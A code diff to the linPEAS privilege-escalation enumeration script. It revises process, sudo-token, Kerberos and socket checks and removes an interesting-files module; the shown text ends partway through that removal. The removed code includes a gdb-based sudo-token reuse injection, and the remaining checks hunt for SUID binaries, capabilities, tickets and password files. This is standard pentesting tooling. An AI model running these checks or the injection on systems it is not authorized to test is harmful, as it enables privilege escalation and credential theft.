--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
@@ -6,13 +6,18 @@
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Cleaned proccesses
  print_2title "Cleaned processes"
+
  if [ "$NOUSEPS" ]; then
    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
  fi
  print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"

+  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
+    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
+  fi
+
  if [ "$NOUSEPS" ]; then
-    print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
    pslist=$(print_ps)
  else
    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
@@ -42,6 +47,33 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
  echo ""
 fi

+CURRENT_USER_PIVOT_PID=""
+if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
+  #-- PCS) Process opened by other users
+  print_2title "Processes whose PPID belongs to a different user (not root)"
+  print_info "You will know if a user can somehow spawn processes as a different user"
+  
+  # Function to get user by PID
+  get_user_by_pid() {
+    ps -p "$1" -o user | grep -v "USER"
+  }
+
+  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
+  ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
+    if [ "$ppid" = "0" ]; then
+      continue
+    fi
+    ppid_user=$(get_user_by_pid "$ppid")
+    if echo "$user" | grep -Eqv "$ppid_user|root$"; then
+      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+      if [ "$ppid_user" = "$USER" ]; then
+        CURRENT_USER_PIVOT_PID="$ppid"
+      fi
+    fi
+  done
+  echo ""
+fi
+
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Files opened by processes belonging to other users
  if ! [ "$IAMROOT" ]; then
@@ -71,7 +103,13 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
    temp_file=$(mktemp)
-    if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
+    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
+      for i in $(seq 1 1210); do 
+        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
+      done;
+      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
+      rm "$temp_file";
+    fi
    echo ""
  fi
 fi
@@ -109,7 +147,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
      program=""
      program=$(defaults read "$f" Program 2>/dev/null)
      if ! [ "$program" ]; then
-        program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
+        program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
      fi
      if [ -w "$program" ]; then
        echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
@@ -173,12 +211,12 @@ printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
      fi
    done
    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
-    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/")
+    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
    if [ "$relpath1" ] || [ "$relpath2" ]; then
      if [ "$WRITABLESYSTEMDPATH" ]; then
-        echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},";
+        echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
      else
-        echo "$s is executing some relative path"
+        echo "$s could be executing some relative path"
      fi
    fi
  fi
@@ -249,6 +287,7 @@ if ! [ "$IAMROOT" ]; then
    if ! [ "$unix_scks_list" ];then
      unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
    fi
+     unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") 
  fi
  
  if ! [ "$SEARCH_IN_FOLDER" ]; then
@@ -259,7 +298,7 @@ if ! [ "$IAMROOT" ]; then
  fi

  # Detele repeated dockets and check permissions
-  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
+  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
    perms=""
    if [ -r "$l" ]; then
      perms="Read "
--- a/linPEAS/builder/linpeas_parts/5_network_information.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information.sh
@@ -24,7 +24,7 @@ fi
 #-- NI) Interfaces
 print_2title "Interfaces"
 cat /etc/networks 2>/dev/null
-(ifconfig || ip a) 2>/dev/null
+(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
 echo ""

 #-- NI) Neighbours
@@ -54,7 +54,7 @@ fi
 #-- NI) Ports
 print_2title "Active Ports"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
-( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
 echo ""

 #-- NI) MacOS hardware ports
--- a/linPEAS/builder/linpeas_parts/6_users_information.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information.sh
@@ -68,7 +68,7 @@ fi
 if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
 fi
-for filename in '/etc/sudoers.d/*'; do
+for filename in /etc/sudoers.d/*; do
  if [ -r "$filename" ]; then
    echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
    grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" 
@@ -80,27 +80,29 @@ echo ""
 print_2title "Checking sudo tokens"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
 ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
-if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g";
-else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then 
+  echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
+  
+  if [ "$(command -v gdb 2>/dev/null)" ]; then 
+    echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
  fi
-is_gdb="$(command -v gdb 2>/dev/null)"
-if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
-else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g";
+  
+  if [ "$CURRENT_USER_PIVOT_PID" ]; then 
+    echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
  fi
-if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
-  echo "Checking for sudo tokens in other shells owned by current user"
-  for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do
-    echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null)
-    echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
-    if [ -f "/tmp/shrndom32r2r" ]; then
-      echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
-      break
+  
+  if [ -f "$HOME/.sudo_as_admin_successful" ]; then
+    echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
  fi
-  done
-  if [ -f "/tmp/shrndom32r2r" ]; then
-    rm -f /tmp/shrndom32r2r 2>/dev/null
-  else echo "The escalation didn't work... (try again later?)"
+
+  if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
+    echo "Current user has other interactive shells running" | sed -${E} "s,.*,${SED_RED},g";
+    ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
  fi
+
+else 
+  echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+
 fi
 echo ""

--- a/linPEAS/builder/linpeas_parts/7_software_information.sh
+++ b/linPEAS/builder/linpeas_parts/7_software_information.sh
@@ -129,9 +129,9 @@ if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
      done
    fi
    
-    mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
+    mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so")
    if [ "$mysqlexec" ]; then
-      echo "Found $mysqlexec"
+      echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)"
      echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
    fi
  done
@@ -325,17 +325,21 @@ peass{NFS Exports}
 #-- SI) Kerberos
 kadmin_exists="$(command -v kadmin)"
 klist_exists="$(command -v klist)"
-if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
+kinit_exists="$(command -v kinit)"
+if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
  print_2title "Searching kerberos conf files and tickets"
  print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory"

  if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
+  if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi
  if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
  ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
  if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
  else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
  fi
  
+  (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g"
+
  printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
    if [ -r "$f" ]; then
      if echo "$f" | grep -q .k5login; then
@@ -376,6 +380,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [

 fi

+peass{FreeIPA}
+
 peass{Knockd}

 peass{Kibana}
@@ -505,7 +511,7 @@ SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
 if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then
  print_2title "Searching uncommon passwd files (splunk)"
  if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
-  printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
+  printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do
    if [ -f "$f" ] && ! [ -x "$f" ]; then
      echo "passwd file: $f" | sed "s,$f,${SED_RED},"
      cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
--- a/linPEAS/builder/linpeas_parts/8_interesting_files.sh
+++ b/linPEAS/builder/linpeas_parts/8_interesting_files.sh
@@ -1,723 +0,0 @@
-###########################################
-#----------) Interesting files (----------#
-###########################################
-
-check_critial_root_path(){
-  folder_path="$1"
-  if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
-  if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
-  if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi
-}
-
-
-
-
-##-- IF) SUID
-print_2title "SUID - Check easy privesc, exploits and write perms"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
-if ! [ "$STRINGS" ]; then
-  echo_not_found "strings"
-fi
-if ! [ "$STRACE" ]; then
-  echo_not_found "strace"
-fi
-suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
-for s in $suids_files; do
-  s=$(ls -lahtr "$s")
-  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
-  if echo "$s" | grep -qE "^total"; then break; fi
-
-  sname="$(echo $s | awk '{print $9}')"
-  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
-    true #Don't do nothing
-  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
-    echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
-  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
-    echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  else
-    c="a"
-    for b in $sidB; do
-      if echo $s | grep -q $(echo $b | cut -d % -f 1); then
-        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
-        c=""
-        break;
-      fi
-    done;
-    if [ "$c" ]; then
-      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
-        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
-      else
-        echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED},"
-        printf $ITALIC
-        if ! [ "$FAST" ] && [ "$STRINGS" ]; then
-          $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
-            sline_first="$(echo "$sline" | cut -d ' ' -f1)"
-            if echo "$sline_first" | grep -qEv "$cfuncs"; then
-              if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
-                if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
-                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
-                fi
-              else #If not a path
-                if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
-                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
-                fi
-              fi
-            fi
-          done
-          if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
-            printf $ITALIC
-            echo "----------------------------------------------------------------------------------------"
-            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
-            OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
-            export LD_LIBRARY_PATH=""
-            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
-            printf $NC
-            export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
-            echo "----------------------------------------------------------------------------------------"
-            echo ""
-          fi
-        fi
-      fi
-    fi
-  fi
-done;
-echo ""
-
-
-##-- IF) SGID
-print_2title "SGID"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
-sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
-for s in $sgids_files; do
-  s=$(ls -lahtr "$s")
-  #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
-  if echo "$s" | grep -qE "^total";then break; fi
-
-  sname="$(echo $s | awk '{print $9}')"
-  if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
-    true #Don't do nothing
-  elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
-    echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
-  elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
-    echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-  else
-    c="a"
-    for b in $sidB; do
-      if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
-        echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
-        c=""
-        break;
-      fi
-    done;
-    if [ "$c" ]; then
-      if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
-        echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
-      else
-        echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
-        printf $ITALIC
-        if ! [ "$FAST" ] && [ "$STRINGS" ]; then
-          $STRINGS "$sname" | sort | uniq | while read sline; do
-            sline_first="$(echo $sline | cut -d ' ' -f1)"
-            if echo "$sline_first" | grep -qEv "$cfuncs"; then
-              if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
-                if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
-                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
-                fi
-              else #If not a path
-                if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
-                  printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
-                fi
-              fi
-            fi
-          done
-          if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then
-            printf "$ITALIC"
-            echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
-            timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
-            printf "$NC"
-            echo ""
-          fi
-        fi
-      fi
-    fi
-  fi
-done;
-echo ""
-
-##-- IF) Misconfigured ld.so
-if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
-  print_2title "Checking misconfigurations of ld.so"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so"
-  printf $ITALIC"/etc/ld.so.conf\n"$NC;
-  cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
-  cat /etc/ld.so.conf 2>/dev/null | while read l; do
-    if echo "$l" | grep -q include; then
-      ini_path=$(echo "$l" | cut -d " " -f 2)
-      fpath=$(dirname "$ini_path")
-      if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
-      printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
-      for f in $fpath/*; do
-        printf $ITALIC"  $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
-        cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
-      done
-    fi
-  done
-  echo ""
-fi
-
-##-- IF) Capabilities
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Capabilities"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
-  if [ "$(command -v capsh)" ]; then
-    echo "Current env capabilities:"
-    (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh"
-    echo "Current proc capabilities:"
-    (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:	0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
-    echo ""
-    echo "Parent Shell capabilities:"
-    (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh"
-  else
-    echo "Current capabilities:"
-    cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g"
-    echo ""
-    echo "Shell capabilities:"
-    cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g"
-  fi
-  echo ""
-  echo "Files with capabilities (limited to 50):"
-  getcap -r / 2>/dev/null | head -n 50 | while read cb; do
-    capsVB_vuln=""
-    
-    for capVB in $capsVB; do
-      capname="$(echo $capVB | cut -d ':' -f 1)"
-      capbins="$(echo $capVB | cut -d ':' -f 2)"
-      if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
-        echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-        capsVB_vuln="1"
-        break
-      fi
-    done
-    
-    if ! [ "$capsVB_vuln" ]; then
-      echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
-    fi
-
-    if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
-      echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
-    fi
-  done
-  echo ""
-fi
-
-##-- IF) Users with capabilities
-if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then
-  print_2title "Users with capabilities"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
-  if [ -f "/etc/security/capability.conf" ]; then
-    grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
-  else echo_not_found "/etc/security/capability.conf"
-  fi
-  echo ""
-fi
-
-##-- IF) AppArmor profiles to prevent suid/capabilities abuse
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then
-    print_2title "AppArmor binary profiles"
-    ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\."
-    echo ""
-  fi
-fi
-
-##-- IF) Files with ACLs
-print_2title "Files with ACLs (limited to 50)"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls"
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
-else
-  ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
-fi
-
-if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then  #Find ACL files in macos (veeeery slow)
-  ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
-fi
-echo ""
-
-##-- IF) Files with ResourceFork
